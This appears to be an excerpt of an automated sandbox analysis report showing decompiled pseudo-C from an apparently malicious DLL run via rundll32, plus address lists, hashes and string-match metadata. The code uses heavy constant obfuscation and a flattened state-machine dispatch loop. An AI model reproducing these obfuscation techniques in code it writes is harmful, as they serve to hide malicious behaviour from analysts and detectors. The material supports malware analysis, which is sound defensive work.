                                                                                                                                                            				_v192 =  *_t26 * 0x43;
                                                                                                                                                            				_v192 = _v192 ^ 0x0df05af0;
                                                                                                                                                            				_v308 = 0x42c709;
                                                                                                                                                            				_v308 = _v308 | 0x3400f9ef;
                                                                                                                                                            				_v308 = _v308 << 3;
                                                                                                                                                            				_v308 = _v308 + 0x3df1;
                                                                                                                                                            				_v308 = _v308 ^ 0xa2183d69;
                                                                                                                                                            				_v152 = 0x5369e0;
                                                                                                                                                            				_v152 = _v152 ^ 0xff6c3c62;
                                                                                                                                                            				_v152 = _v152 ^ 0xff3f5582;
                                                                                                                                                            				_v276 = 0x14bd80;
                                                                                                                                                            				_v276 = _v276 << 5;
                                                                                                                                                            				_v276 = _v276 ^ 0x5f90d5fe;
                                                                                                                                                            				_v276 = _v276 / _t732;
                                                                                                                                                            				_v276 = _v276 ^ 0x00de92e5;
                                                                                                                                                            				_v164 = 0xc6025f;
                                                                                                                                                            				_t733 = 0x77;
                                                                                                                                                            				_v164 = _v164 / _t733;
                                                                                                                                                            				_v164 = _v164 ^ 0x0001a9f8;
                                                                                                                                                            				_v196 = 0xc87c9f;
                                                                                                                                                            				_v196 = _v196 + 0x15df;
                                                                                                                                                            				_v196 = _v196 ^ 0x00c8927e;
                                                                                                                                                            				_v316 = 0xe66987;
                                                                                                                                                            				_v316 = _v316 ^ 0x1b2582a6;
                                                                                                                                                            				_t734 = 0x3b;
                                                                                                                                                            				_v316 = _v316 * 0x5b;
                                                                                                                                                            				_v316 = _v316 + 0x2fb1;
                                                                                                                                                            				_v316 = _v316 ^ 0xdea4c46c;
                                                                                                                                                            				_v224 = 0xfe0ac2;
                                                                                                                                                            				_v224 = _v224 + 0xfffff1ae;
                                                                                                                                                            				_v224 = _v224 ^ 0x9ea75b7a;
                                                                                                                                                            				_v224 = _v224 ^ 0x9e5aa70a;
                                                                                                                                                            				_v272 = 0x969b46;
                                                                                                                                                            				_v272 = _v272 / _t734;
                                                                                                                                                            				_t735 = 0x5e;
                                                                                                                                                            				_v272 = _v272 / _t735;
                                                                                                                                                            				_v272 = _v272 ^ 0xefd30b8f;
                                                                                                                                                            				_v272 = _v272 ^ 0xefd30d7c;
                                                                                                                                                            				_v376 = 0x150d1;
                                                                                                                                                            				_v376 = _v376 + 0xf180;
                                                                                                                                                            				_v376 = _v376 ^ 0x94f4a204;
                                                                                                                                                            				_v376 = _v376 + 0xffff1e44;
                                                                                                                                                            				_v376 = _v376 ^ 0x94f362d9;
                                                                                                                                                            				_v156 = 0xee57c3;
                                                                                                                                                            				_v156 = _v156 >> 1;
                                                                                                                                                            				_v156 = _v156 ^ 0x00740491;
                                                                                                                                                            				_v212 = 0xc602fd;
                                                                                                                                                            				_v212 = _v212 + 0x6a76;
                                                                                                                                                            				_v212 = _v212 + 0x1c99;
                                                                                                                                                            				_v212 = _v212 ^ 0x00ce641d;
                                                                                                                                                            				_v268 = 0xce4877;
                                                                                                                                                            				_v268 = _v268 ^ 0x1d22fca4;
                                                                                                                                                            				_v268 = _v268 | 0x3421cf88;
                                                                                                                                                            				_v268 = _v268 ^ 0x3de53c3b;
                                                                                                                                                            				_v124 = 0x747c03;
                                                                                                                                                            				_v124 = _v124 + 0xffffbae7;
                                                                                                                                                            				_v124 = _v124 ^ 0x007459dd;
                                                                                                                                                            				_v236 = 0x1c09ef;
                                                                                                                                                            				_t736 = 0x7d;
                                                                                                                                                            				_v236 = _v236 * 0x24;
                                                                                                                                                            				_v236 = _v236 >> 5;
                                                                                                                                                            				_v236 = _v236 ^ 0x00154586;
                                                                                                                                                            				_v248 = 0xce2f;
                                                                                                                                                            				_v248 = _v248 / _t736;
                                                                                                                                                            				_v248 = _v248 ^ 0x54fb24c5;
                                                                                                                                                            				_v248 = _v248 ^ 0x54f69380;
                                                                                                                                                            				_v368 = 0xa2f216;
                                                                                                                                                            				_v368 = _v368 ^ 0x77671628;
                                                                                                                                                            				_v368 = _v368 + 0xffffb776;
                                                                                                                                                            				_t737 = 0x12;
                                                                                                                                                            				_v368 = _v368 * 0x54;
                                                                                                                                                            				_v368 = _v368 ^ 0x4cdde93a;
                                                                                                                                                            				_v256 = 0x7ecaf1;
                                                                                                                                                            				_v256 = _v256 + 0xffff3fac;
                                                                                                                                                            				_v256 = _v256 >> 1;
                                                                                                                                                            				_v256 = _v256 ^ 0x003aef01;
                                                                                                                                                            				_v352 = 0xabf876;
                                                                                                                                                            				_v352 = _v352 >> 0xb;
                                                                                                                                                            				_v352 = _v352 + 0xffff46d6;
                                                                                                                                                            				_v352 = _v352 + 0x2c0c;
                                                                                                                                                            				_v352 = _v352 ^ 0xfff246b3;
                                                                                                                                                            				_v360 = 0x97ba77;
                                                                                                                                                            				_v360 = _v360 ^ 0x3e0377f3;
                                                                                                                                                            				_v360 = _v360 >> 0xd;
                                                                                                                                                            				_v360 = _v360 / _t737;
                                                                                                                                                            				_v360 = _v360 ^ 0x00060934;
                                                                                                                                                            				_v336 = 0x8ce7a6;
                                                                                                                                                            				_t738 = 0x2f;
                                                                                                                                                            				_v336 = _v336 / _t738;
                                                                                                                                                            				_v336 = _v336 + 0xffff2624;
                                                                                                                                                            				_v336 = _v336 | 0x278756f7;
                                                                                                                                                            				_v336 = _v336 ^ 0x278bbfdd;
                                                                                                                                                            				_v344 = 0xbf551b;
                                                                                                                                                            				_v344 = _v344 * 0x3a;
                                                                                                                                                            				_v344 = _v344 ^ 0x84c4554b;
                                                                                                                                                            				_v344 = _v344 << 0xf;
                                                                                                                                                            				_v344 = _v344 ^ 0x8ea60236;
                                                                                                                                                            				_v200 = 0x4381fe;
                                                                                                                                                            				_v200 = _v200 | 0xd1728d79;
                                                                                                                                                            				_v200 = _v200 ^ 0xd172d7b5;
                                                                                                                                                            				_v304 = 0x80f198;
                                                                                                                                                            				_t739 = 0x31;
                                                                                                                                                            				_v304 = _v304 * 0x64;
                                                                                                                                                            				_v304 = _v304 << 0xe;
                                                                                                                                                            				_v304 = _v304 + 0xffff9e99;
                                                                                                                                                            				_v304 = _v304 ^ 0x97d19a3f;
                                                                                                                                                            				_v312 = 0x373eb5;
                                                                                                                                                            				_v312 = _v312 / _t739;
                                                                                                                                                            				_v312 = _v312 >> 9;
                                                                                                                                                            				_v312 = _v312 ^ 0x9e5751db;
                                                                                                                                                            				_v312 = _v312 ^ 0x9e5d4ba0;
                                                                                                                                                            				_v188 = 0xb51e1e;
                                                                                                                                                            				_t740 = 0x6d;
                                                                                                                                                            				_v188 = _v188 * 0x30;
                                                                                                                                                            				_v188 = _v188 ^ 0x21f969de;
                                                                                                                                                            				_v128 = 0x6dafe5;
                                                                                                                                                            				_v128 = _v128 + 0xdb72;
                                                                                                                                                            				_v128 = _v128 ^ 0x00632f59;
                                                                                                                                                            				_v348 = 0xf775fc;
                                                                                                                                                            				_v348 = _v348 * 0x7b;
                                                                                                                                                            				_v348 = _v348 | 0xe77e6c6c;
                                                                                                                                                            				_v348 = _v348 + 0xffff92b3;
                                                                                                                                                            				_v348 = _v348 ^ 0xf7fd41f8;
                                                                                                                                                            				_v292 = 0x49707d;
                                                                                                                                                            				_v292 = _v292 + 0xffffa330;
                                                                                                                                                            				_v292 = _v292 + 0x378d;
                                                                                                                                                            				_v292 = _v292 ^ 0x2a616ae7;
                                                                                                                                                            				_v292 = _v292 ^ 0x2a2200cf;
                                                                                                                                                            				_v148 = 0xe2ca7f;
                                                                                                                                                            				_v148 = _v148 + 0x2800;
                                                                                                                                                            				_v148 = _v148 ^ 0x00ec4a73;
                                                                                                                                                            				_v180 = 0x28ed65;
                                                                                                                                                            				_t276 =  &_v180; // 0x28ed65
                                                                                                                                                            				_v180 =  *_t276 / _t740;
                                                                                                                                                            				_v180 = _v180 ^ 0x0008a356;
                                                                                                                                                            				_v340 = 0xb04f06;
                                                                                                                                                            				_v340 = _v340 | 0x19ae51aa;
                                                                                                                                                            				_v340 = _v340 + 0xffff0ab2;
                                                                                                                                                            				_v340 = _v340 >> 7;
                                                                                                                                                            				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                                                            				_v252 = 0x779412;
                                                                                                                                                            				_t741 = 0x28;
                                                                                                                                                            				_v252 = _v252 / _t741;
                                                                                                                                                            				_v252 = _v252 | 0x065d8c29;
                                                                                                                                                            				_v252 = _v252 ^ 0x0653787d;
                                                                                                                                                            				_v140 = 0x2cf99d;
                                                                                                                                                            				_v140 = _v140 << 0xf;
                                                                                                                                                            				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                                                            				_v300 = 0xa5c7e2;
                                                                                                                                                            				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                                                            				_v300 = _v300 | 0xd6032566;
                                                                                                                                                            				_v300 = _v300 << 7;
                                                                                                                                                            				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                                                            				_v204 = 0xc71fe4;
                                                                                                                                                            				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                                                            				_v204 = _v204 ^ 0x39346367;
                                                                                                                                                            				_v332 = 0x26340b;
                                                                                                                                                            				_t742 = 0xc;
                                                                                                                                                            				_v332 = _v332 / _t742;
                                                                                                                                                            				_v332 = _v332 >> 0xc;
                                                                                                                                                            				_v332 = _v332 + 0x4006;
                                                                                                                                                            				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                                                            				_v244 = 0xb4bdd0;
                                                                                                                                                            				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                                                            				_t743 = 0x5c;
                                                                                                                                                            				_v244 = _v244 * 0x56;
                                                                                                                                                            				_v244 = _v244 ^ 0xe668140d;
                                                                                                                                                            				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E00384624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E0038DCF7(_v376, 0x371984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E00379462(_t701, _v368,  &_v116, E0038DCF7(_v268, 0x371814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E0037A8B0(_v352, _t701, _v360);
											E0037A8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E0037957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E0038DCF7(_v148, 0x371854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E00371C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x393dfc; // 0x0
														E0037ED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E0037A8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E0037B144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E0038DCF7(_v324, 0x371854, _t856);
																_pop(_t772);
                                                                                                                                                            																E0037AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                                                            																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                                                            																E0037A8B0(_v220, _t719, _v356);
                                                                                                                                                            																_t847 = _t847 + 0x2c;
                                                                                                                                                            																L13:
                                                                                                                                                            																_t842 = 0x6cd454e;
                                                                                                                                                            																L32:
                                                                                                                                                            																_t819 = 0x9b01f0f;
                                                                                                                                                            																_t747 = 0xb34e23f;
                                                                                                                                                            																_t690 = 0xa0b11f8;
                                                                                                                                                            															}
                                                                                                                                                            															goto L33;
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									L36:
                                                                                                                                                            									return _t846;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t725 - _t747;
                                                                                                                                                            								if(_t725 == _t747) {
                                                                                                                                                            									_t691 = E00372BD9(_v112);
                                                                                                                                                            									_t725 = 0xb500bcf;
                                                                                                                                                            									__eflags = _t691;
                                                                                                                                                            									_t846 =  !=  ? 1 : _t846;
                                                                                                                                                            									goto L32;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _t725 - 0xb500bcf;
                                                                                                                                                            									if(_t725 == 0xb500bcf) {
                                                                                                                                                            										E0038CA69(_v112, _v168, _v176);
                                                                                                                                                            										_t725 = 0xcc5fcc9;
                                                                                                                                                            										goto L1;
                                                                                                                                                            									} else {
                                                                                                                                                            										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                                                            										if(_t725 == 0xcc5fcc9) {
                                                                                                                                                            											E0037A958(_v216, _v108, _v184);
                                                                                                                                                            											_t725 = _t840;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												L1:
                                                                                                                                                            												_t747 = 0xb34e23f;
                                                                                                                                                            												goto L2;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											__eflags = _t725 - _t840;
                                                                                                                                                            											if(_t725 == _t840) {
                                                                                                                                                            												E0037A958(_v288, _v120, _v296);
                                                                                                                                                            												_t725 = 0x505fe8e;
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L1:
                                                                                                                                                            													_t747 = 0xb34e23f;
                                                                                                                                                            													goto L2;
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												__eflags = _t725 - 0xec78b05;
                                                                                                                                                            												if(__eflags != 0) {
                                                                                                                                                            													goto L33;
                                                                                                                                                            												} else {
                                                                                                                                                            													_v104 = _v96;
                                                                                                                                                            													_t697 = E003792C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                                                            													_t847 = _t847 + 0x14;
                                                                                                                                                            													__eflags = _t697 - _v192;
                                                                                                                                                            													_t819 = 0x9b01f0f;
                                                                                                                                                            													_t747 = 0xb34e23f;
                                                                                                                                                            													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                                                            													goto L3;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								goto L36;
                                                                                                                                                            								L33:
                                                                                                                                                            							} while (_t725 != 0xc75135f);
                                                                                                                                                            							goto L36;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}

                                                                                                                                                            0x0037bf5b
                                                                                                                                                            0x0037bf63
                                                                                                                                                            0x0037bf6b
                                                                                                                                                            0x0037bf78
                                                                                                                                                            0x0037bf7c
                                                                                                                                                            0x0037bf84
                                                                                                                                                            0x0037bf90
                                                                                                                                                            0x0037bf93
                                                                                                                                                            0x0037bf97
                                                                                                                                                            0x0037bf9f
                                                                                                                                                            0x0037bfa7
                                                                                                                                                            0x0037bfaf
                                                                                                                                                            0x0037bfbc
                                                                                                                                                            0x0037bfc0
                                                                                                                                                            0x0037bfc8
                                                                                                                                                            0x0037bfcd
                                                                                                                                                            0x0037bfd5
                                                                                                                                                            0x0037bfe0
                                                                                                                                                            0x0037bfeb
                                                                                                                                                            0x0037bff8
                                                                                                                                                            0x0037c007
                                                                                                                                                            0x0037c00a
                                                                                                                                                            0x0037c00e
                                                                                                                                                            0x0037c013
                                                                                                                                                            0x0037c01b
                                                                                                                                                            0x0037c023
                                                                                                                                                            0x0037c033
                                                                                                                                                            0x0037c037
                                                                                                                                                            0x0037c03c
                                                                                                                                                            0x0037c044
                                                                                                                                                            0x0037c04c
                                                                                                                                                            0x0037c05f
                                                                                                                                                            0x0037c062
                                                                                                                                                            0x0037c069
                                                                                                                                                            0x0037c074
                                                                                                                                                            0x0037c07f
                                                                                                                                                            0x0037c08a
                                                                                                                                                            0x0037c095
                                                                                                                                                            0x0037c0a2
                                                                                                                                                            0x0037c0a6
                                                                                                                                                            0x0037c0ae
                                                                                                                                                            0x0037c0b6
                                                                                                                                                            0x0037c0be
                                                                                                                                                            0x0037c0c6
                                                                                                                                                            0x0037c0ce
                                                                                                                                                            0x0037c0d6
                                                                                                                                                            0x0037c0de
                                                                                                                                                            0x0037c0e6
                                                                                                                                                            0x0037c0f1
                                                                                                                                                            0x0037c0fc
                                                                                                                                                            0x0037c107
                                                                                                                                                            0x0037c112
                                                                                                                                                            0x0037c11d
                                                                                                                                                            0x0037c124
                                                                                                                                                            0x0037c12f
                                                                                                                                                            0x0037c137
                                                                                                                                                            0x0037c13f
                                                                                                                                                            0x0037c147
                                                                                                                                                            0x0037c14c
                                                                                                                                                            0x0037c154
                                                                                                                                                            0x0037c166
                                                                                                                                                            0x0037c16b
                                                                                                                                                            0x0037c174
                                                                                                                                                            0x0037c17f
                                                                                                                                                            0x0037c18a
                                                                                                                                                            0x0037c195
                                                                                                                                                            0x0037c19d
                                                                                                                                                            0x0037c1a8
                                                                                                                                                            0x0037c1b0
                                                                                                                                                            0x0037c1b8
                                                                                                                                                            0x0037c1c0
                                                                                                                                                            0x0037c1c5
                                                                                                                                                            0x0037c1cd
                                                                                                                                                            0x0037c1d8
                                                                                                                                                            0x0037c1e3
                                                                                                                                                            0x0037c1ee
                                                                                                                                                            0x0037c1fa
                                                                                                                                                            0x0037c1fd
                                                                                                                                                            0x0037c201
                                                                                                                                                            0x0037c206
                                                                                                                                                            0x0037c20e
                                                                                                                                                            0x0037c216
                                                                                                                                                            0x0037c223
                                                                                                                                                            0x0037c238
                                                                                                                                                            0x0037c23b
                                                                                                                                                            0x0037c242
                                                                                                                                                            0x0037c24d
                                                                                                                                                            0x0037c258
                                                                                                                                                            0x0037c26e
                                                                                                                                                            0x0037c275
                                                                                                                                                            0x0037c280
                                                                                                                                                            0x0037c293
                                                                                                                                                            0x0037c296
                                                                                                                                                            0x0037c29d
                                                                                                                                                            0x0037c2a8
                                                                                                                                                            0x0037c2b0
                                                                                                                                                            0x0037c2c0
                                                                                                                                                            0x0037c2c4
                                                                                                                                                            0x0037c2cc
                                                                                                                                                            0x0037c2d4
                                                                                                                                                            0x0037c2dc
                                                                                                                                                            0x0037c2e4
                                                                                                                                                            0x0037c2ec
                                                                                                                                                            0x0037c2f1
                                                                                                                                                            0x0037c2f9
                                                                                                                                                            0x0037c306
                                                                                                                                                            0x0037c307
                                                                                                                                                            0x0037c30b
                                                                                                                                                            0x0037c313
                                                                                                                                                            0x0037c31b
                                                                                                                                                            0x0037c323
                                                                                                                                                            0x0037c32e
                                                                                                                                                            0x0037c336
                                                                                                                                                            0x0037c341
                                                                                                                                                            0x0037c349
                                                                                                                                                            0x0037c351
                                                                                                                                                            0x0037c361
                                                                                                                                                            0x0037c365
                                                                                                                                                            0x0037c36d
                                                                                                                                                            0x0037c378
                                                                                                                                                            0x0037c380
                                                                                                                                                            0x0037c38b
                                                                                                                                                            0x0037c396
                                                                                                                                                            0x0037c3a3
                                                                                                                                                            0x0037c3a7
                                                                                                                                                            0x0037c3af
                                                                                                                                                            0x0037c3b7
                                                                                                                                                            0x0037c3cb
                                                                                                                                                            0x0037c3d2
                                                                                                                                                            0x0037c3dd
                                                                                                                                                            0x0037c3e8
                                                                                                                                                            0x0037c3f0
                                                                                                                                                            0x0037c3fa
                                                                                                                                                            0x0037c3fe
                                                                                                                                                            0x0037c406
                                                                                                                                                            0x0037c40e
                                                                                                                                                            0x0037c419
                                                                                                                                                            0x0037c424
                                                                                                                                                            0x0037c42c
                                                                                                                                                            0x0037c437
                                                                                                                                                            0x0037c43f
                                                                                                                                                            0x0037c447
                                                                                                                                                            0x0037c455
                                                                                                                                                            0x0037c456
                                                                                                                                                            0x0037c45b
                                                                                                                                                            0x0037c466
                                                                                                                                                            0x0037c46b
                                                                                                                                                            0x0037c46f
                                                                                                                                                            0x0037c477
                                                                                                                                                            0x0037c48a
                                                                                                                                                            0x0037c491
                                                                                                                                                            0x0037c49c
                                                                                                                                                            0x0037c4a7
                                                                                                                                                            0x0037c4b2
                                                                                                                                                            0x0037c4bd
                                                                                                                                                            0x0037c4c8
                                                                                                                                                            0x0037c4d0
                                                                                                                                                            0x0037c4dd
                                                                                                                                                            0x0037c4e6
                                                                                                                                                            0x0037c4ea
                                                                                                                                                            0x0037c4f2
                                                                                                                                                            0x0037c4fd
                                                                                                                                                            0x0037c505
                                                                                                                                                            0x0037c510
                                                                                                                                                            0x0037c51b
                                                                                                                                                            0x0037c523
                                                                                                                                                            0x0037c52e
                                                                                                                                                            0x0037c542

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                                            • API String ID: 0-258179307
                                                                                                                                                            • Opcode ID: 8102f86cb4f273f45a1d007f899a66b45ca4c875abcc8afe29a325352160ef4b
                                                                                                                                                            • Instruction ID: b844d51c57e4a8fa3bfda7ddeee4b7f3919b9266f907a65712477d04d8d34cc0
                                                                                                                                                            • Opcode Fuzzy Hash: 8102f86cb4f273f45a1d007f899a66b45ca4c875abcc8afe29a325352160ef4b
                                                                                                                                                            • Instruction Fuzzy Hash: 3072E1715093819FD379CF25C58AA9FBBE2BBC4304F10891DE6DA8A260D7B58949CF03
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E00384B87(void* __ecx) {
                                                                                                                                                            				char _v524;
                                                                                                                                                            				char _v1044;
                                                                                                                                                            				char _v1564;
                                                                                                                                                            				char _v2084;
                                                                                                                                                            				char _v2604;
                                                                                                                                                            				signed int _v2608;
                                                                                                                                                            				intOrPtr _v2612;
                                                                                                                                                            				intOrPtr _v2616;
                                                                                                                                                            				intOrPtr _v2620;
                                                                                                                                                            				intOrPtr _v2624;
                                                                                                                                                            				char _v2628;
                                                                                                                                                            				intOrPtr _v2632;
                                                                                                                                                            				char _v2636;
                                                                                                                                                            				signed int _v2640;
                                                                                                                                                            				signed int _v2644;
                                                                                                                                                            				signed int _v2648;
                                                                                                                                                            				signed int _v2652;
                                                                                                                                                            				signed int _v2656;
                                                                                                                                                            				signed int _v2660;
                                                                                                                                                            				signed int _v2664;
                                                                                                                                                            				signed int _v2668;
                                                                                                                                                            				signed int _v2672;
                                                                                                                                                            				signed int _v2676;
                                                                                                                                                            				signed int _v2680;
                                                                                                                                                            				signed int _v2684;
                                                                                                                                                            				signed int _v2688;
                                                                                                                                                            				signed int _v2692;
                                                                                                                                                            				signed int _v2696;
                                                                                                                                                            				signed int _v2700;
                                                                                                                                                            				signed int _v2704;
                                                                                                                                                            				signed int _v2708;
                                                                                                                                                            				signed int _v2712;
                                                                                                                                                            				signed int _v2716;
                                                                                                                                                            				signed int _v2720;
                                                                                                                                                            				signed int _v2724;
                                                                                                                                                            				signed int _v2728;
                                                                                                                                                            				signed int _v2732;
                                                                                                                                                            				signed int _v2736;
                                                                                                                                                            				signed int _v2740;
                                                                                                                                                            				signed int _v2744;
                                                                                                                                                            				signed int _v2748;
                                                                                                                                                            				signed int _v2752;
                                                                                                                                                            				signed int _v2756;
                                                                                                                                                            				signed int _v2760;
                                                                                                                                                            				signed int _v2764;
                                                                                                                                                            				signed int _v2768;
                                                                                                                                                            				signed int _v2772;
                                                                                                                                                            				signed int _v2776;
                                                                                                                                                            				signed int _v2780;
                                                                                                                                                            				signed int _v2784;
                                                                                                                                                            				signed int _v2788;
                                                                                                                                                            				signed int _v2792;
                                                                                                                                                            				signed int _v2796;
                                                                                                                                                            				signed int _v2800;
                                                                                                                                                            				signed int _v2804;
                                                                                                                                                            				signed int _v2808;
                                                                                                                                                            				signed int _v2812;
                                                                                                                                                            				signed int _v2816;
                                                                                                                                                            				signed int _v2820;
                                                                                                                                                            				signed int _v2824;
                                                                                                                                                            				signed int _v2828;
                                                                                                                                                            				signed int _v2832;
                                                                                                                                                            				signed int _v2836;
